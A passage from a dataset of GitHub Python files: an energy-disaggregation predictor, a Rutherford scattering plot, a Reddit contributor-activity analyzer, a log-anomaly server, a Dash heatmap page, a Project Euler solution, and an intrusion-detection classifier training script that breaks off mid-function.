self.appliance_classifier_dict[appliance_name].load_model()\n except ImportError as e:\n raise e\n\n self.log.info(\"-----Completed loading default models-----\")\n\n def _check_if_model_already_loaded(self, appliance_name, model_name):\n if appliance_name in self.appliance_classifier_dict:\n if self.appliance_classifier_dict[appliance_name].model_name == model_name:\n return True\n return False\n return False\n\n def _load_models(self, appliance_name, model_name):\n if not self._check_if_model_already_loaded(appliance_name, model_name):\n self.log.info(\"Model not found. Loading model {} for appliance {}.\".format(model_name, appliance_name))\n module = importlib.import_module(('classifiers.{}'.format(_module_names[appliance_name])))\n class_ = getattr(module, '{}'.format(_classifier_names[appliance_name]))\n self.appliance_classifier_dict[appliance_name] = class_(model_name=model_name)\n try:\n self.appliance_classifier_dict[appliance_name].load_model()\n except ImportError as e:\n self.log.exception(e)\n raise e\n else:\n self.log.info(\"Model {} already loaded for appliance {}\".format(model_name, appliance_name))\n\n def _select_measurements(self, measurements, resumeTime):\n \"\"\"\n Select measurements from input by resumeTime\n :param measurements:\n :param resumeTime:\n :return:\n \"\"\"\n if isinstance(resumeTime, int):\n return measurements.loc[convert_to_datetime(resumeTime):, :]\n elif isinstance(resumeTime, pd.datetime):\n return measurements.loc[resumeTime:, :]\n else:\n raise TypeError(\"Resume time not an integer, long or a valid pd.datetime: {}\".format(resumeTime))\n\n def predict(self, measurements, algoDefinitions, freq, meter=None):\n \"\"\"\n Predict all disaggregation results for selected appliances.\n :param measurements: pandas.DataFrame, measurements with columns ['power'] and index in pandas datetime\n :param algoDefinitions: List,\n :param freq: int, frequency of measurements\n :param meter: str, meter name\n :return:\n output: dict, appliance_name as key and appliance_power_dict as value\n \"\"\"\n self.log.info(\"-----Starting event detection on {}-----\".format(meter))\n\n if freq > 10 * 1000:\n # do not resample for these meters with larger resolution\n sample_period = '60s'\n measurements = measurements.resample(sample_period).mean() # .resample('900s').mean()\n else:\n sample_period = '6s'\n measurements = measurements.resample(sample_period).mean()\n measurements = measurements.fillna(0)\n\n output = {}\n if len(measurements) > 10:\n events = event_detection(measurements)\n\n for algo_def in algoDefinitions:\n # Retreiving all the information\n appliance_name = algo_def['applianceName']\n algorithm_id = algo_def.get(\"algorithmId\")\n resumeTime = algo_def.get('resumeTime')\n\n df = self._select_measurements(measurements, resumeTime)\n self.log.info(\"Loading models.........\")\n self._load_models(appliance_name, algorithm_id)\n appliance_classifier = self.appliance_classifier_dict[appliance_name]\n\n appliance_present = appliance_classifier.preprocess(measurements=df, events=events)\n # Todo: Correct this, appliance_present= True\n self.log.info(\"Is Appliance {} present: {}.\".format(appliance_name, appliance_present))\n if appliance_present:\n # appliance_power = pd.DataFrame()\n appliance_power_dict = appliance_classifier.predict(df, events, freq)\n output[appliance_name] = appliance_power_dict\n\n return output\n\n\ndef algorithm_select(appliance_list, mains):\n \"\"\"\n Select appliances for prediction\n :param appliance_list: list, list of selected appliances\n :param mains:\n :return:\n \"\"\"\n\n if isinstance(mains.index[0], int):\n start_time = convert_to_datetime(mains.index[0])\n elif isinstance(mains.index[0], pd.datetime):\n start_time = mains.index[0]\n else:\n raise TypeError(\"Resume time not an integer, long or a valid pd.datetime: {}\".format(type(mains.index[0])))\n algo_def = [\n {\"algorithmId\": 'exp1',\n \"resumeTime\": start_time,\n \"applianceName\": \"REFRIGERATOR\"\n },\n {\"algorithmId\": 'exp1',\n \"resumeTime\": start_time,\n \"applianceName\": \"WASHING_MACHINE\"\n },\n {\"algorithmId\": 'exp1',\n \"resumeTime\": start_time,\n \"applianceName\": \"DISHWASHER\"\n },\n {\"algorithmId\": 'simple',\n \"resumeTime\": start_time,\n \"applianceName\": \"HEATING\"\n },\n {\"algorithmId\": 'simple',\n \"resumeTime\": start_time,\n \"applianceName\": \"BASE_LOAD\"\n },\n {\"algorithmId\": 'exp1',\n \"resumeTime\": start_time,\n \"applianceName\": \"DRYER\"\n },\n ]\n\n new_algo_def = []\n for item in algo_def:\n if item['applianceName'] in appliance_list:\n new_algo_def.append(item)\n return new_algo_def\n\n\ndef test(plot=True):\n\n mains = pd.read_csv(\n './dataset/' + 'building_1_mains.csv',\n header=None, index_col=None)\n building_1_dish_washer = pd.read_csv(\n './dataset/' + 'building_1_dish_washer.csv',\n header=None, index_col=None)\n building_1_fridge = pd.read_csv(\n './dataset/' + 'building_1_fridge.csv',\n header=None, index_col=None)\n building_1_kettle = pd.read_csv(\n './dataset/' + 'building_1_kettle.csv',\n header=None, index_col=None)\n building_1_washing_machine = pd.read_csv(\n './dataset/' + 'building_1_washing_machine.csv',\n header=None, index_col=None)\n\n ground_truth = {\n 'DISHWASHER': building_1_dish_washer,\n 'HEATING': building_1_kettle,\n 'REFRIGERATOR': building_1_fridge,\n 'WASHING_MACHINE': building_1_washing_machine, }\n\n df = mains.copy()\n df.columns = ['power']\n df.index = pd.date_range(start='2017-01-01 00:00:00', periods=len(df), freq='6s')\n print('length of df {}'.format(len(df)))\n print(df.tail())\n print(\"--------------------\")\n print(building_1_dish_washer.head())\n\n algoDefinitions = algorithm_select(['BASE_LOAD', 'DISHWASHER',\n 'HEATING', 'REFRIGERATOR', 'WASHING_MACHINE'], df)\n container = Disaggregator()\n events_start = time.time()\n print(\"Time taken {}\".format(time.time() - events_start))\n print(\"-----Starting Predictions-----\")\n start = time.time()\n predicted = container.predict(df, algoDefinitions, freq=1000)\n print(\"TF Prediction done in {} with {}\".format(time.time() - start, predicted))\n\n if plot:\n import matplotlib.pyplot as plt\n # plot predicted\n plt.figure(figsize=(16, 8))\n legend = []\n for app, pre_dict in predicted.items():\n if app != 'BASE_LOAD':\n for model_name, pre_series in pre_dict.items():\n plt.plot(pre_series.index, pre_series.values)\n legend.append('Predicted: {}'.format(model_name + '_' + pre_series.name))\n plt.plot(df.index, df['power'].values)\n legend.append('Input')\n plt.xlabel('Time')\n plt.ylabel('Leistung [W]')\n plt.legend(legend, loc='upper right')\n plt.title('All_disaggregation_test', wrap=True)\n plt.savefig('All_disaggregation_test.png')\n\n # plot ground truth\n plt.figure(figsize=(16, 8))\n legend = []\n for app, true_y in ground_truth.items():\n plt.plot(df.index, true_y.values)\n legend.append('Ground truth: {}'.format(app))\n\n plt.plot(df.index, df['power'].values)\n legend.append('Input')\n plt.xlabel('Time')\n plt.ylabel('Leistung [W]')\n plt.legend(legend, loc='upper right')\n plt.title('All ground truth', wrap=True)\n plt.savefig('All_ground_truth.png')\n\n # plot app-wise ground truth and predicted\n for app, pre_dict in predicted.items():\n if app != 'BASE_LOAD':\n plt.figure(figsize=(16, 8))\n legend = []\n true_y = ground_truth[app]\n plt.plot(df.index, true_y.values)\n legend.append('Ground truth: {}'.format(app))\n for model_name, pre_series in pre_dict.items():\n plt.plot(pre_series.index, pre_series.values)\n legend.append('Predicted: {}'.format(pre_series.name))\n\n plt.xlabel('Time')\n plt.ylabel('Leistung [W]')\n plt.legend(legend, loc='upper right')\n plt.title('Ground_Truth vs Predicted: {}'.format(app), wrap=True)\n plt.savefig('Ground_Truth_vs_Predicted_{}.png'.format(app))\n # plt.show()\n\n # plot all predicted together\n plt.figure(figsize=(16, 8))\n legend = []\n for app, pre_dict in predicted.items():\n for model_name, pre_series in pre_dict.items():\n plt.plot(pre_series.index, pre_series.values)\n legend.append('Predicted: {}'.format(model_name + '_' + app))\n plt.xlabel('Time')\n plt.ylabel('Leistung [W]')\n plt.legend(legend, loc='upper right')\n plt.title('All Predicted', wrap=True)\n plt.savefig('All_Predicted.png')\n # plt.show()\n\n\nif __name__ == \"__main__\":\n test()\n","repo_name":"opensourcedcgy/ESZ-disaggregation","sub_path":"serve/run_disaggregation.py","file_name":"run_disaggregation.py","file_ext":"py","file_size_in_byte":13635,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"31554642742","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport scipy.constants as c\nfrom pint import UnitRegistry\nu = UnitRegistry()\n\n\ndef scattering(theta, z=2, Z=79, alpha_energy=5.408 * u.MeV):\n theta = theta.to('radian')\n angle_dependency = 1 / (np.sin(theta/2)**4)\n a = 1 / ((4 * np.pi * epsilon_0)**2)\n b = (z * Z * e**2 / (4 * alpha_energy))**2\n return a * b * angle_dependency\n\n\ndf = pd.read_csv('data/scattering_gold_2_micrometer.csv', comment='#', index_col=0)\n\n\ntop = r'''\\begin{tabular}{S[table-format=1.0] S[table-format=3.0]}\n \\toprule\n {$\\theta \\mathbin{/} \\si{\\degree}$} & {$N$} \\\\\n \\midrule\n'''\nbottom = r''' \\bottomrule\n\\end{tabular}\n'''\nwith open('build/scattering_gold_2_micrometer.tex', 'w') as f:\n\n f.write(top)\n\n temp = r' {} & {} \\\\'\n for row in df.itertuples():\n f.write(temp.format(row.Index, row.counts))\n f.write('\\n')\n f.write(bottom)\n\n\ndx = 2 * u.mm\ndy = 10 * u.mm\nl = (41 + 4) * u.mm\ndelta_omega = np.arctan(dy / (2 * l)) * np.arctan(dx / (2 * l)) * 4\nprint('delta_omega is {}'.format(delta_omega))\n\ndensity_gold = 19.3 * (u.kg / u.m**3)\nthickness = 2 * u.micrometer\ngold_mass = 197 * u.gram / u.mol\nn_0 = (density_gold * thickness * c.N_A / u.mol) / gold_mass\nprint('n_0 is {}'.format(n_0.to('1/cm^2')))\n\nR = (41 + 39 + 17 + 4) * u.mm\nA_detector = 2 * u.mm * 10 * u.mm\nN_source = (A_detector / (4 * np.pi * R**2)) * (318000) / u.second\nprint('N_source is {} '.format(N_source.to('1/s')))\n\nN_meassurement = (df.counts.values / 60)/u.second\nprint('N_meassurement is {}'.format(N_meassurement))\n\ncross_section = N_meassurement / (N_source * n_0 * delta_omega)\n# print((N_source * n_0 * delta_omega).to('1/cm^2 1/s 1/radian^2'))\nprint('cross_section is {}'.format(cross_section.to('barn/degree')))\n\nplt.plot(\n df.index,\n cross_section.to('barn/radian'),\n '+',\n label='Gemessener Streuquerschnitt',\n)\n\ne = (c.e * u.coulomb)\nepsilon_0 = c.epsilon_0 * (u.ampere * u.second / (u.volt * u.meter))\nts = np.linspace(0, df.index.max(), 2000) * u.degree\nalpha_energy = 5.408 * u.MeV\nscatter = scattering(\n theta=ts,\n z=2,\n Z=79,\n alpha_energy=alpha_energy,\n).to('barn/radian')\n\nplt.plot(\n ts[scatter.magnitude < 1e9],\n scatter[scatter.magnitude < 1e9],\n '-',\n label='Theoretischer Streuquerschnitt',\n)\nplt.xlabel('Winkel in Grad')\nplt.ylabel(r'$\\dd{\\sigma}{\\Omega} \\Biggm/ \\si{\\barn\\per\\steradian}$')\n\nplt.legend(loc='best')\nplt.tight_layout(pad=0.4)\nplt.savefig('build/plots/cross_section.pdf')\n","repo_name":"maxnoe/tudo_masterfp","sub_path":"v16_rutherford/scripts/plot_cross_section.py","file_name":"plot_cross_section.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"40715034094","text":"import prawcore\nimport datetime\nimport os\nimport constants\nimport threading\nimport sys\nsys.path.append('.')\nfrom utils import reddit_utils\nfrom tqdm import tqdm\nfrom dotenv import load_dotenv\nload_dotenv(override=True)\n\n\n\"\"\"OH so this is the script where all the magic happens. I'm not even convinced multi-threading was helpful\n here since reddit imposes a pretty strict rate-limit of 60 users/minute I think. But anyways, the point\n of this script is to get the most recent public post of each user in your subreddit, get the date of it, and then store\n (username, years since most recent post) in a csv.\n It takes a while\"\"\"\n\n\nclass SubredditAnalyzer:\n def __init__(self, sub_name=\"ravenclaw\"):\n self.reddit_client = reddit_utils.create_reddit_client()\n self.subreddit = self.reddit_client.subreddit(sub_name)\n self.lock = threading.Lock()\n # TODO: Ideally, I think I would increment a version or something.\n if os.path.exists(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.MAIN_TEXT_FILE)):\n os.remove(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.MAIN_TEXT_FILE))\n if os.path.exists(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.SHADOWBANNED)):\n os.remove(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.SHADOWBANNED))\n if os.path.exists(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.UNVERIFIED)):\n os.remove(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.UNVERIFIED))\n if os.path.exists(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.UNSUBSCRIBED)):\n os.remove(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.UNSUBSCRIBED))\n if os.path.exists(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.RECENCY_CSV)):\n os.remove(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.RECENCY_CSV))\n\n def get_random_facts(self) -> str:\n \"\"\"Get some random statistics for fun\"\"\"\n sub_time_created = reddit_utils.convert_reddit_timestamp(self.subreddit.created_utc)\n sub_description = self.subreddit.public_description\n sub_count = self.subreddit.subscribers\n sub_name = self.subreddit.display_name\n num_banned = 0\n banned_users = []\n for ban in self.subreddit.banned():\n num_banned += 1\n banned_users.append(f\"{ban}: {ban.note}\")\n return f\"{sub_name} was created on {sub_time_created}. It has {sub_count} subscribers, and its \" \\\n f\"public description is {sub_description}. There are {num_banned} banned users in {sub_name}:\\n\" \\\n f\"{chr(10).join(banned_users)}\"\n\n def get_contributors(self, start_idx=0, end_idx=1000):\n \"\"\"Iterate through the subreddit's contributors and get number of banned/suspended/shadowbanned,\n As well as when each contributor's last (public) post was\"\"\"\n print(start_idx)\n print(end_idx)\n num_contributors = 0\n contributors = []\n shadowbanneds = []\n unverifieds = []\n unsubscribeds = []\n num_unverified = 0\n num_unsubscribed = 0\n num_suspended_or_banned = 0\n years_since_last_post = {\n 0: [],\n 1: [],\n 2: [],\n 3: [],\n 4: [],\n 5: [],\n }\n\n for contributor in tqdm(self.subreddit.contributor(limit=end_idx), total=end_idx):\n if num_contributors <= start_idx - 1:\n num_contributors += 1\n continue\n num_contributors += 1\n try:\n if contributor.verified is False:\n num_unverified += 1\n unverifieds.append(contributor.name)\n with self.lock:\n with open(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.UNVERIFIED), \"a\") as f:\n f.write(f\"{contributor.name}\\n\")\n continue\n if contributor.has_subscribed is False:\n num_unsubscribed += 1\n unsubscribeds.append(contributor.name)\n with self.lock:\n with open(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.UNSUBSCRIBED), \"a\") as f:\n f.write(f\"{contributor.name}\\n\")\n continue\n except AttributeError:\n num_suspended_or_banned += 1\n shadowbanneds.append(contributor.name)\n with self.lock:\n with open(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.SHADOWBANNED), \"a\") as f:\n f.write(f\"{contributor.name}\\n\")\n continue\n except prawcore.exceptions.NotFound:\n print(f\"Is {contributor} suspended? {contributor.is_suspended}. They have been banned or some shit\")\n num_suspended_or_banned += 1\n shadowbanneds.append(contributor.name)\n continue\n for most_recent_post in contributor.new(limit=1):\n time_created = datetime.datetime.utcfromtimestamp(int(most_recent_post.created_utc))\n if time_created + datetime.timedelta(days=366*5) < datetime.datetime.now():\n delta_years = 5\n years_since_last_post[5].append(contributor)\n # print(f\"{contributor} has not posted anything publicly in the last 5 years.\")\n elif time_created + datetime.timedelta(days=366 * 4) < datetime.datetime.now():\n delta_years = 4\n years_since_last_post[4].append(contributor)\n # print(f\"{contributor} has not posted anything publicly in the last 4 years.\")\n elif time_created + datetime.timedelta(days=366 * 3) < datetime.datetime.now():\n delta_years = 3\n years_since_last_post[3].append(contributor)\n # print(f\"{contributor} has not posted anything publicly in the last 3 years.\")\n elif time_created + datetime.timedelta(days=366 * 2) < datetime.datetime.now():\n delta_years = 2\n years_since_last_post[2].append(contributor)\n # print(f\"{contributor} has not posted anything publicly in the last 2 years.\")\n elif time_created + datetime.timedelta(days=366 * 1) < datetime.datetime.now():\n delta_years = 1\n years_since_last_post[1].append(contributor)\n # print(f\"{contributor} has not posted anything publicly in the last year.\")\n else:\n delta_years = 0\n years_since_last_post[0].append(contributor)\n with self.lock:\n with open(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.RECENCY_CSV), 'a') as csv_file:\n csv_file.write(f\"{contributor.name},{delta_years}\\n\")\n contributors.append(contributor.name)\n with self.lock:\n with open(os.path.join(os.getcwd(), constants.OUTPUT_DIR, constants.MAIN_TEXT_FILE), \"a\") as f:\n f.write(f\"{contributor.name}\\n\")\n\n\n def run_threads(self, num_threads=12):\n threads = []\n for i in range(num_threads):\n thread = threading.Thread(target=self.get_contributors, args=(i * (12_000/num_threads), (i+1) * (12_000/num_threads)))\n threads.append(thread)\n thread.start()\n\n\nif __name__ == '__main__':\n analyzer = SubredditAnalyzer()\n analyzer.run_threads(num_threads=12)\n","repo_name":"kevslinger/admissions-scripts","sub_path":"subreddit_data_scripts/most_recent_post.py","file_name":"most_recent_post.py","file_ext":"py","file_size_in_byte":7710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6350467084","text":"#!/usr/bin/env python\n\n\"\"\"\nbackend server\ninitialize all classes (watcher/preper/results/feedback/model)\nstart watcher\n\"\"\"\nimport re, json\n\nimport yappi, time, threading\n\n\nfrom config.config import Config\nfrom predictor.predict import Predictor\nfrom datasource.watcher import Watcher\nfrom datasource.batcher import Batcher\nfrom prep.log_parser import LogParser\nfrom prep.log_parser_nlp import LogParserNLP\nfrom label.labeler import Labeler\nfrom feedback.fb_mgr import FeedbackMgr\nfrom results.result_mgr import ResultMgr\nfrom results.result import Result\nfrom storage.sqlite import SqliteStore\n\n\ndef is_result_error(result: str):\n return result and result != \"__label__Normal\"\n\nclass Server():\n def __init__(self, config: Config):\n self.config = config\n prepcfg = config[\"drain3\"]\n\n store = SqliteStore()\n #self.preper = LogParser(config_file=prepcfg[\"config_file\"], persist=True, persist_dir=prepcfg[\"persist_dir\"])\n self.preper = LogParserNLP(model_file=prepcfg[\"model_file\"])\n self.labler = Labeler(naive=True, datadir=prepcfg[\"persist_dir\"])\n self.feedback = FeedbackMgr(remote_url=\"\", local_file=\"./fb.csv\", store=store)\n self.results = ResultMgr(fbmgr=self.feedback, store=store)\n\n self.predictor = Predictor(preper=self.preper, model=self.labler)\n self.watcher = Watcher(config=config, callback=self.process_line)\n self.batcher = Batcher(config=config, callback=self.process_line)\n \n \n def start_watch(self):\n self.watcher.start()\n\n # start batcher in back ground\n def start_batch_in_bg(self, file: str):\n self.batcher.start_in_bg(file)\n\n # start batcher in foreground\n def start_batch(self, file: str):\n self.batcher.start(file)\n\n # start watcher in back ground\n def start_in_bg(self):\n self.watcher.start_in_bg()\n\n def process_line(self, line: str, meta: dict, context: dict = {}):\n\n # print(\"before prediction\", meta)\n\n result = self.predictor.predict(line, meta, context)\n \n # print(\"after prediction\", result.meta)\n\n if result is not None and result.is_error():\n self.results.add(result)\n\n\n\nif __name__ == \"__main__\":\n cfg = {}\n cfg[\"drain3\"]={\"config_file\":\"drain3.ini\", \"persist_dir\":\".\", \"model_file\":\"model/star.cla.bin\"}\n server = Server(config=cfg)\n yappi.start()\n server.start_batch(\"/tmp/ClusterDelete.zip\")\n time.sleep(30)\n yappi.stop()\n\n threads = yappi.get_thread_stats()\n for thread in threads:\n print(\n \"Function stats for (%s) (%d)\" % (thread.name, thread.id)\n ) # it is the Thread.__class__.__name__\n yappi.get_func_stats(ctx_id=thread.id).print_all()\n","repo_name":"kuberca/star","sub_path":"backend/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38917315234","text":"\"\"\"\n Dash app\n\"\"\"\n\nimport dash_core_components as dcc\nfrom dash.dependencies import Input, Output\n\nimport utilities as u\nimport constants as c\nimport layout as lay\nfrom plots import plots_heatmaps as plots\n\n\nclass Page(lay.AppPage):\n \"\"\" Page Heatmaps \"\"\"\n\n link = c.dash.LINK_HEATMAPS\n\n def __init__(self, app):\n super().__init__([c.dash.INPUT_CATEGORIES])\n\n @app.callback(\n [Output(f\"plot_heat_{x}\", \"figure\") for x in [\"i\", \"e\", \"distribution\"]],\n [\n Input(\"global_df\", \"children\"),\n Input(\"input_categories\", \"value\"),\n Input(\"heat_aux\", \"children\"),\n ],\n )\n # pylint: disable=unused-variable,unused-argument\n def update_plots(df_in, categories, aux):\n \"\"\"\n Updates the plots\n\n Args:\n df_in: transactions dataframe\n categories: categories to use\n \"\"\"\n df = u.dfs.filter_data(u.uos.b64_to_df(df_in), categories)\n return (\n plots.get_heatmap(df, c.names.INCOMES),\n plots.get_heatmap(df, c.names.EXPENSES),\n plots.dist_plot(df),\n )\n\n def get_body(self):\n return [\n lay.two_columns(\n [\n lay.card(dcc.Graph(id=\"plot_heat_i\", config=c.dash.PLOT_CONFIG)),\n lay.card(dcc.Graph(id=\"plot_heat_e\", config=c.dash.PLOT_CONFIG)),\n ]\n ),\n lay.card(dcc.Graph(id=\"plot_heat_distribution\", config=c.dash.PLOT_CONFIG)),\n lay.get_dummy_div(\"heat_aux\"),\n ]\n","repo_name":"villoro/expensor","sub_path":"src/pages/page_heatmaps.py","file_name":"page_heatmaps.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"20432525706","text":"def is_leap_year(year):\n if year % 4 == 0:\n if year % 1000 == 0:\n if year % 400 == 0:\n return True\n else:\n return False\n else:\n return True\n else:\n return False\n\n\ndef days_of_month(month, year):\n days = [0, 31, 0, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n if month != 2:\n return days[month]\n else:\n if is_leap_year(year):\n return 29\n else:\n return 28\n\n\ndef counting_sundays(from_year, to_year):\n current_day = 1\n count = 0\n\n for i in range(1900, to_year + 1):\n for j in range(1, 13):\n if current_day == 7:\n if i >= from_year:\n count += 1\n days = days_of_month(j, i)\n if days == 29:\n current_day += 1\n if days == 30:\n current_day += 2\n if days == 31:\n current_day += 3\n if current_day > 7:\n current_day %= 7\n\n return count\n\n\nprint(\"Result is {}\".format(counting_sundays(1901, 2000)))\n","repo_name":"janFrancoo/Project-Euler","sub_path":"problem19/p19.py","file_name":"p19.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4122902370","text":"import os\nimport json\nimport csv\nimport sys\nimport pickle\nimport time\nimport logging\nimport argparse\nimport pandas as pd\n\nfrom sklearn import metrics\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import TimeSeriesSplit\nfrom sklearn.model_selection import KFold, StratifiedKFold\n\nformatter = '%(asctime)s [%(filename)s:%(lineno)s - %(funcName)20s()] %(levelname)s | %(message)s'\n\nlogging.basicConfig(filename=r\"out/classifier-log.log\", # todo fix this\n filemode='a',\n format=formatter,\n datefmt='%H:%M:%S',\n level=logging.DEBUG)\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\nfrom process_data import read_files, normalise_data, sort_time\n\ndef make_dir(path):\n if not os.path.exists(path):\n logger.info(\"Creating directory at path: {0}\".format(path))\n os.makedirs(path)\n\ndef label_encode_class(data):\n def label_encoder_mapping(le):\n # todo save this label encoder later for prediction.\n return dict(zip(le.classes_, le.transform(le.classes_)))\n\n assert data.shape[1] == 1 # only one column - output label.\n\n le = LabelEncoder()\n le.fit(data)\n\n logger.info(\"Label encoder mapping {0}\".format(label_encoder_mapping(le)))\n\n return le.transform(data).ravel(), label_encoder_mapping(le)\n\n\ndef split_data(data, test_size=0.3, normalise=False):\n from sklearn.model_selection import train_test_split\n categorical_columns = data.select_dtypes(['object'])\n excluded_columns = ['Timestamp', 'Dst Port']\n output = ['Label']\n inputs = [label for label in list(data) if label not in output and label not in categorical_columns\n and label not in excluded_columns]\n\n if normalise:\n logger.info(\"Data is being normalised.\")\n data[inputs] = normalise_data(data[inputs])\n\n X = data[inputs]\n y, mapping = label_encode_class(data[output])\n logger.info(\"Y/Output variable {0} with shape {1}\".format(output, y.shape))\n logger.info(\"X/Input variables {0} with shape {1}\".format(inputs, X.shape))\n logger.info(\"Train vs Test split: {0}-{1}\".format(1 - test_size, test_size))\n # return train_test_split(X, y, test_size=test_size), mapping # 70% training and 30% test\n return X.to_numpy(), y, mapping, X.columns\n\ndef split_time_series(data, normalise=True):\n no_of_split = 3# int((len(data) - 3) / 3) # 67-33\n categorical_columns = data.select_dtypes(['object'])\n excluded_columns = ['Timestamp', 'Dst Port']\n\n output = ['Label']\n inputs = [label for label in list(data) if label not in output and label not in categorical_columns\n and label not in excluded_columns]\n\n if normalise:\n logger.info(\"Data is being normalised.\")\n logger.info(\"Inputs: {0}\".format(inputs))\n data[inputs] = normalise_data(data[inputs])\n\n X = data[inputs]\n y, mapping = label_encode_class(data[output])\n time_series_split = TimeSeriesSplit(n_splits=no_of_split)\n\n for train_index, test_index in time_series_split.split(X):\n # To get the indices\n #logger.info(\"Train index: {0} - Test index: {1}\".format(train_index, test_index))\n X_train, X_test = X.iloc[train_index], X.iloc[test_index]\n # print(\"X: {0}\".format(X))\n #print(\"Xtrain: {0}\".format(X_train))\n #print(\"Xtest: {0}\".format(X_test))\n y_train, y_test = y[train_index], y[test_index]\n #print(\"Y: {0}\".format(y))\n #print(\"Y_train: {0}\".format(y_train))\n #print(\"Y_test: {0}\".format(y_test))\n logger.info(\"Observations: {0}\".format(len(train_index) + len(test_index)))\n logger.info(\"Training observations: {0}\".format(len(train_index)))\n logger.info(\"Testing observations: {0}\".format(len(test_index)))\n yield X_train, X_test, y_train, y_test, mapping\n\n\ndef generate_classification_report(fp, method, y_test, y_pred, save=False):\n report = metrics.classification_report(y_test, y_pred, output_dict=True)\n report_df = pd.DataFrame(report).T\n\n out = r\"{0}/{1}-classification_report.csv\".format(fp, method)\n if save:\n report_df.to_csv(out)\n logger.info(\"Saving classification report at location: {0}\".format(out))\n return report\n\n\ndef save_metrics(fp, method_name, mapping, accuracy, time, i=\"\"):\n encoder_out = '{0}/{1}-encoder-mapping-{2}.txt'.format(fp, method_name, i)\n logger.info(\"Saving label encoder data at location: %s\" % encoder_out)\n pd.DataFrame.from_dict(mapping, orient='index').to_csv(encoder_out)\n\n metrics_out = '{0}/{1}-metrics-{2}.txt'.format(fp, method_name, i)\n metrics_dict = {'accuracy': accuracy,\n 'run-time': time}\n\n logger.info(\"Accuracy: {0}\".format(accuracy))\n logger.info(\"Classifier took {0} seconds to train\".format(time))\n logger.info(\"Saving metrics file at location {0}\".format(metrics_out))\n pd.DataFrame.from_dict(metrics_dict, orient='index').to_csv(metrics_out)\n\n\ndef save_feature_importances(feature_importances, fp, i=\"\"):\n feature_importances.to_csv(r\"{0}/random-forest-feature-importance-{1}.csv\".format(fp, i))\n\n\ndef save_model(model, method_name, fp, i=\"\"):\n out = (\"{0}/{1}-{2}.sav\").format(fp, method_name, i)\n logger.info(\"Saving {0} model at location: {1}\".format(method_name, out))\n pickle.dump(model, open(out, 'wb'))\n\n\ndef calculate_time(start_time):\n return time.time() - start_time\n\ndef random_forest_classifier(data, fp, save=False, time_series=False):\n from sklearn.ensemble import RandomForestClassifier\n method_name = \"random-forest\"\n\n if time_series:\n for i, Xy in enumerate(split_time_series(data)):\n X_train, X_test, y_train, y_test, mapping = Xy\n print(type(mapping))\n logger.info(\"Random forest classifier -- TIME SERIES -- initialised\")\n start_time = time.time()\n clf = RandomForestClassifier(n_estimators=100, verbose=2)\n clf.fit(X_train, y_train)\n feature_importances = pd.DataFrame(clf.feature_importances_, index=X_train.columns,\n columns=['importance']).sort_values('importance', ascending=False)\n\n y_pred = clf.predict(X_test)\n generate_classification_report(fp, \"{0}-{1}\".format(method_name, i), y_test, y_pred, save)\n accuracy = metrics.accuracy_score(y_test, y_pred)\n run_time = calculate_time(start_time)\n save_feature_importances(feature_importances, fp, i)\n\n if save:\n save_metrics(fp, method_name, mapping, accuracy, run_time, i)\n save_model(clf, method_name, fp, i)\n\n else:\n X, y, mapping, columns = split_data(data)\n # X_train, X_test, y_train, y_test = Xy\n\n cv = StratifiedKFold(n_splits=10, random_state=42, shuffle=False)\n logger.info(\"Random forest classifier -- initialised\")\n i = 0\n for train_index, test_index in cv.split(X, y):\n X_train, X_test, y_train, y_test = X[train_index], X[test_index], y[train_index], y[test_index]\n start_time = time.time()\n clf = RandomForestClassifier(n_estimators=100, verbose=2)\n clf.fit(X_train, y_train)\n\n feature_importances = pd.DataFrame(clf.feature_importances_, index=columns,\n columns=['importance']).sort_values('importance', ascending=False)\n\n y_pred = clf.predict(X_test)\n rf_out = r\"{0}/{1}\".format(fp, i)\n make_dir(rf_out)\n generate_classification_report(rf_out, method_name, y_test, y_pred, save)\n accuracy = metrics.accuracy_score(y_test, y_pred)\n run_time = calculate_time(start_time)\n save_feature_importances(feature_importances, rf_out)\n\n if save:\n save_metrics(rf_out, method_name, mapping, accuracy, run_time)\n save_model(clf, method_name, rf_out)\n i += 1\n\n\ndef support_vector_machine_classifier(data, fp, save=False, time_series=False):\n from sklearn import svm\n method_name = \"svm\"\n\n if time_series:\n for i, Xy in enumerate(split_time_series(data)):\n X_train, X_test, y_train, y_test, mapping = Xy\n logger.info(\"Support vector machine classifier -- TIME SERIES -- initialised\")\n start_time = time.time()\n clf = svm.LinearSVC(verbose=10)\n clf.fit(X_train, y_train)\n\n y_pred = clf.predict(X_test)\n generate_classification_report(fp, method_name, y_test, y_pred, save)\n accuracy = metrics.accuracy_score(y_test, y_pred)\n run_time = calculate_time(start_time)\n\n if save:\n save_metrics(fp, method_name, mapping, accuracy, run_time)\n save_model(clf, method_name, fp)\n\n 